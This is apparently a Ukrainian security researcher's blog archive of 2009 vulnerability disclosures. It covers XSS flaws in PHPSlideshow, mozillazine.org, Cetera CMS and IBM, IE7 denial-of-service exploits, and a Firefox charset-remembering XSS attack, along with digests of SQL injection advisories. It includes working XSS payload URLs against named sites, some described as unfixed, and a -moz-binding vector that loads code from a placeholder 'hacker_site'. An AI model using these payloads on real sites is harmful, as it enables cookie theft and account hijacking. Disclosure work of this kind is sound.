Архів для категорії 'Уразливості'

DoS уразливості в Internet Explorer 7

23:56 07.03.2009

У вересні, 29.09.2008, я виявив Denial of Service уразливості в Internet Explorer 7. Дані уразливості були раніше виявлені в IE6 в 2006 році (в проекті MoBB) і, як я перевірив, IE7 також вразливий. До сих пір Microsoft їх не виправила.

DoS:

IE DoS Exploit2.html

IE DoS Exploit3.html

При запуску експлоїтів браузер вилітає або підвисає.

Уразлива версія Internet Explorer 7 (7.0.6000.16711) і попередні версії.

Нова уразливість в PHPSlideshow

19:33 07.03.2009

07.01.2009

Нещодавно, 04.01.2009, я знайшов нову Cross-Site Scripting уразливість в PHPSlideshow. Після того як оприлюднив попередню уразливість в PHPSlideshow. Дірку виявив на офіційному сайті http://www.zinkwazi.com. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливість з’явиться пізніше.

07.03.2009

XSS:

http://site/phpslideshow.php?directory=%3Cscript%3Ealert(document.cookie)%3C/script%3E:

Уразливі PHPSlideshow 0.9.9.3 та попереді версії. Розробник PHPSlideshow досі не виправив дану уразливість ні в своєму веб додатку, ні в себе на сайті.

Добірка уразливостей

16:17 06.03.2009

В даній добірці уразливості в веб додатках:

  • Aruba Mobility Controller User Authentication Vulnerability (деталі)
  • PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals (деталі)
  • SmarterMail Enterprise 4.3 - malformed mail XSS (деталі)
  • WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability (деталі)
  • Multiple XSS Injections in Jinzora Media Jukebox (деталі)
  • PR08-01: Several XSS, a cross-domain redirect and a webroot disclosure on Spyce - Python Server Pages (PSP) (деталі)
  • PHP-Nuke Module Web_Links SQL Injection(cid) (деталі)
  • XOOPS Module eEmpregos SQL Injection(cid) (деталі)
  • XOOPS Module wflinks SQL Injection(cid) (деталі)
  • XOOPS Module classifieds SQL Injection(cid) (деталі)

Уразливості в плагінах для WordPress №16

23:55 05.03.2009

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP-Forum, Forumaction та Recipe. Для котрих з’явилися експлоіти. WP-Forum і Forumaction - це плагіни форуму, Recipe - це плагін для публікації рецептів.

  • Wordpress plugin WP-Forum 1.7.8 Remote SQL Injection Vulnerability (деталі)
  • WordPress forumaction (PAGE_id)(user) SQL Injection (деталі)
  • Wordpress Plugin (wp-content/recipe) SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на www.mozillazine.org

20:36 05.03.2009

26.09.2008

У грудні, 13.12.2007, я знайшов Cross-Site Scripting уразливості на проекті http://www.mozillazine.org. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

05.03.2009

XSS:

POST запит на http://www.mozillazine.org/submit/submissions.php
</textarea><script>alert(document.cookie)</script>В полі: ARTICLE TEXT.

"><script>alert(document.cookie)</script>В полях: CONTRIBUTOR NAME, CONTRIBUTOR EMAIL, ARTICLE LINK.

Дані уразливості досі не виправлені.

Уразливості на www.ibm.com

23:54 04.03.2009

У квітні, 18.04.2008, я знайшов Cross-Site Scripting та HTML Injection уразливості на http://www.ibm.com - сайті компанії IBM. Яка є секюріті компанією (після купівлі ISS і Watchfire). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.ibm.com.

XSS:

HTML Injection (Link Injection):

Окрім Link Injection, також можлива Strictly social XSS атака.

XSS:

Добірка уразливостей

16:15 04.03.2009

В даній добірці уразливості в веб додатках:

  • BitDefender Update Server - Unauthorized Remote File Access Vulnerability (деталі)
  • joomla SQL Injection(com_referenzen) (деталі)
  • PHP-Nuke Module Classifieds SQL Injection(Details) (деталі)
  • joomla SQL Injection(com_asortyment)katid (деталі)
  • aeries browser interface(ABI) 3.8.2.8 Remote SQL Injection (деталі)
  • aeries browser interface(ABI) 3.7.2.2 Remote SQL Injection (деталі)
  • aeries browser interface(ABI) 3.8.2.8 XSS (деталі)
  • PunBB Blind Password Recovery Vulnerability (деталі)
  • Xoops-2.0.16 Remote File Inclusion (деталі)
  • OKI C5510MFP Printer Password Disclosure (деталі)

Charset Remembering Firefox’а наносить удар у відповідь

23:58 03.03.2009

03.03.2009

Так, Charset Remembering Firefox’а наносить удар у відповідь (Firefox’s Charset Remembering strikes back). Раніше я розповідав про Charset Remembering уразливість в Mozilla Firefox. І як я писав в коментарях до свого запису, Mozilla частково виправила уразливість, але виправила лише атаку через UTF-7 (в Firefox 3.0.2). Сама ж Charset Remembering в браузері залишилася, що я перевірив в Firefox 3.0.6. Що може бути використано для проведення подібних атак з іншим кодуванням.

І одразу, як я написав даний коментар, я почав обмірковувати можливість атаки з іншими кодуваннями (окрім UTF-7). В мене виникли підозри, що для даної атаки можна використати кодування EUC-JP або SHIFT_JIS. Що я сьогодні перевірив і підтвердив можливість проведення XSS атаки з EUC-JP (SHIFT_JIS) з використанням Charset Remembering уразливості.

При вказані користувачем для сторінки на сайті кодування, браузер запам’ятовує дане кодування і використовує його в подальшому при всіх запитах до даної сторінки, якщо в ній не вказано кодування. Навіть після перезапуску браузеру - вказане кодування запам’ятовується доти, доки воно не буде змінено на інше. Що дозволить при вказанні кодування EUC-JP (SHIFT_JIS) проводити XSS атаки (при відвіданні сторінок з XSS кодом або приховані атаки через frame/iframe).

Алгоритм атаки (схожий на Charset Remembering з UTF-7):

1. Заманити користувача на сторінку http://site/page.html (де не вказане кодування) і змусити його встановити EUC-JP (SHIFT_JIS) кодування для даної сторінки.

2. Сторінка на сайті, що атакується, повинна бути придатна для проведення XSS атак з variable-width encoding.

3. Розмістити спеціальний XSS код на http://site/page.html (як reflected або persistent) і атакувати користувача на даній сторінці.

4. Доки кодування EUC-JP (SHIFT_JIS) для даної сторінки буде встановлене в браузері, можна буде повторно атакувати користувача.

Уразливі Mozilla Firefox 3.0.6 та всі попередні версії (всі браузери на движку Mozilla).

XSS через Charset Remembering:

Коли фільтруються кутові дужки і лапки, то атакувати можна з використанням -moz-binding.

http://site/page.html?a=%8F&b=%20style=-moz-binding:url(http://hacker_site/xss.xml%23xss)%20

Працює в Mozilla 1.7.x, в Firefox 1.x та потенційно в Firefox 2.x, але не в Firefox 3.0.6 (де виправлений -moz-binding вектор атаки).

Коли фільтруються лише лапки (а кутові дужки можливі), то атакувати можна без -moz-binding.

PoC:

Firefox_XSS_Charset_Remembering.html.

Працює в Mozilla Firefox 3.0.6 та всіх попередніх версіях.

16.06.2012

Як я вияснив, дана атака також може бути проведена при кодуванні Chinese Simplified (HZ). Також XSS і Charset Remembering уразливості наявні в браузерах в Internet Explorer і Opera.

Уразливість на newsukraine.com.ua

19:39 03.03.2009

22.09.2008

У грудні, 09.12.2007, я знайшов Cross-Site Scripting уразливість на проекті http://newsukraine.com.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Про дірки на сайтах онлайнових ЗМІ я часто згадую в новинах. Серед останніх сайтів ЗМІ я писав про заражений dn.kiev.ua та уразливості на expert.com.ua.

Детальна інформація про уразливість з’явиться пізніше.

27.02.2009

XSS:

Дана уразливість вже виправлена.

Уразливість в Cetera CMS

23:55 28.02.2009

У квітні, 16.04.2008, я знайшов Cross-Site Scripting уразливість в системі Cetera CMS. Як раз коли виявив уразливість на www.xbitlabs.com. Про що найближчим часом сповіщу розробникам системи.

XSS:

http://site/misc/picture/?src=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E